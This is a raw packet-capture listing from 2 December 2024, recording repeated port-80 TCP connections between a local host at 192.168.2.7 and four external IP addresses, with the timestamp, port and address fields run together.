                              Dec 2, 2024 15:54:31.258466959 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:31.259043932 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:31.274709940 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:31.395004988 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.780909061 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863445044 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863485098 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863497019 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863548040 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863554001 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863560915 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863595963 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863600016 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863621950 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863635063 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863641977 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863663912 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863687992 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863879919 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863893032 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.863917112 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.863931894 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:32.942193031 CET8049862129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:32.942277908 CET4986280192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:33.795574903 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:33.915513039 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:33.915663004 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:33.932549000 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:34.052511930 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.448250055 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:35.508409977 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508445024 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508459091 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508543968 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508557081 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508563995 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:35.508569956 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508589983 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508642912 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:35.508770943 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508783102 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508795977 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.508815050 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:35.508845091 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:35.508845091 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:35.610219955 CET8049868129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:35.610320091 CET4986880192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:36.467206001 CET4987580192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:36.587255955 CET8049875129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:36.587410927 CET4987580192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:36.603183031 CET4987580192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:36.723362923 CET8049875129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:36.723382950 CET8049875129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:38.104465961 CET4987580192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:38.225207090 CET8049875129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:38.225336075 CET4987580192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:39.126688957 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:39.246793032 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:39.247014999 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:39.256793976 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:39.376750946 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854240894 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854384899 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854398966 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854412079 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854424953 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854438066 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854464054 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854476929 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.854484081 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854499102 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.854532003 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.854532003 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.854959965 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.855000019 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:40.974627972 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.974669933 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:40.974844933 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.095103025 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.095216990 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.095341921 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.099136114 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.100511074 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.100564003 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.100584984 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.108926058 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.108975887 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.109004974 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.117341995 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.117393017 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.117398977 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.125866890 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.125905037 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.125931978 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.134694099 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.134759903 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.134759903 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.142638922 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.142693043 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.142708063 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.151027918 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.151130915 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.151135921 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.159452915 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.159516096 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.159611940 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.168050051 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.168070078 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.168119907 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.176312923 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.176378012 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.215435028 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.260596037 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.296053886 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.324795008 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.324882984 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.325040102 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.328059912 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.328130007 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.328388929 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.334453106 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.334628105 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.336330891 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.336443901 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.336488008 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.342755079 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.342935085 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.343072891 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.349244118 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.349347115 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.349478006 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.355735064 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.355797052 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.355904102 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.361964941 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:41.362107992 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.364753008 CET4988380192.168.2.7129.226.153.85
                              Dec 2, 2024 15:54:41.484718084 CET8049883129.226.153.85192.168.2.7
                              Dec 2, 2024 15:54:46.947462082 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:47.068362951 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:47.068459988 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:47.180071115 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:47.300810099 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458658934 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458709955 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458719015 CET804990147.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:48.458833933 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:48.682673931 CET4990180192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.702234983 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.822319984 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:49.822514057 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.838357925 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:49.958564043 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148338079 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148392916 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148407936 CET804990747.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:51.148441076 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:51.148473978 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:51.354671955 CET4990780192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.379606009 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.499829054 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:52.499995947 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.516985893 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:52.639034986 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:52.639054060 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.921353102 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.921370029 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.921492100 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:53.932646990 CET804991447.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:53.932734013 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:54.026382923 CET4991480192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.045564890 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.166939020 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:55.167078972 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.176253080 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:55.296164036 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495243073 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495335102 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495383024 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:54:56.495424032 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:56.495461941 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:56.498915911 CET4992280192.168.2.747.254.140.255
                              Dec 2, 2024 15:54:56.618901968 CET804992247.254.140.255192.168.2.7
                              Dec 2, 2024 15:55:02.424854040 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:02.545933962 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:02.546020985 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:02.562170982 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:02.682379961 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:03.753151894 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:03.753320932 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:04.073261023 CET4993780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:04.193156004 CET8049937208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:05.092648029 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:05.212658882 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:05.212810993 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:05.228801012 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:05.349663973 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:06.426681995 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:06.426773071 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:06.745148897 CET4994580192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:06.865273952 CET8049945208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:07.770658016 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:07.890945911 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:07.891031027 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:07.906657934 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:08.026796103 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:08.026844025 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:09.119606972 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:09.123054981 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:09.417010069 CET4995180192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:09.536976099 CET8049951208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:10.437150955 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:10.557063103 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:10.557148933 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:10.568321943 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:10.690251112 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428277016 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428318977 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428421021 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428427935 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428471088 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428482056 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428499937 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428654909 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428668022 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428678989 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428685904 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428690910 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428719997 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.428725004 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.428751945 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.548871040 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.549029112 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.549114943 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.552789927 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.604465961 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.642792940 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.642921925 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.643023014 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.646667004 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.648293972 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.648338079 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.648421049 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.656672955 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.656730890 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.656747103 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.665070057 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.665129900 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.665211916 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.673480988 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.673496008 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.673536062 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.681873083 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.681940079 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.682034969 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.690521955 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.690558910 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.690587997 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.698659897 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.698728085 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.698740959 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.707050085 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.707123041 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.707154036 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.715926886 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.715975046 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.716145039 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.724627972 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.724730015 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.850563049 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.850645065 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.850728989 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.853259087 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.854202986 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.854238033 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.854306936 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.859680891 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.859731913 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.859776020 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.865134954 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.865185022 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.865271091 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.871014118 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.871067047 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.871113062 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.876104116 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.876127958 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.876183987 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.881489038 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.881542921 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.881591082 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.887079000 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.887136936 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.887362957 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.892693043 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.892766953 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.892772913 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.897944927 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.898000002 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.898042917 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.903320074 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.903337955 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.903378010 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.908804893 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.908858061 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.908945084 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.914316893 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.914371967 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.914423943 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.919691086 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.919758081 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.919781923 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.925221920 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.925272942 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.925316095 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.930869102 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.930886984 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.930993080 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.936157942 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.936212063 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.936228991 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.941560984 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.941617012 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.941706896 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.947004080 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.947057009 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.947115898 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.952464104 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.952516079 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:12.952548027 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.958060980 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:12.958152056 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.051440954 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.051645041 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.052644968 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.052741051 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.054261923 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.057167053 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.057324886 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.061443090 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.061495066 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.061566114 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.064977884 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.065022945 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.065078020 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.068986893 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.069031000 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.069040060 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.073066950 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.073110104 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.073246002 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:13.075556040 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.094269037 CET4995780192.168.2.7208.91.197.27
                              Dec 2, 2024 15:55:13.214279890 CET8049957208.91.197.27192.168.2.7
                              Dec 2, 2024 15:55:18.440232038 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:18.560286045 CET8049977104.21.24.198192.168.2.7
                              Dec 2, 2024 15:55:18.560379028 CET4997780192.168.2.7104.21.24.198
                              Dec 2, 2024 15:55:18.578898907 CET4997780192.168.2.7104.21.24.198
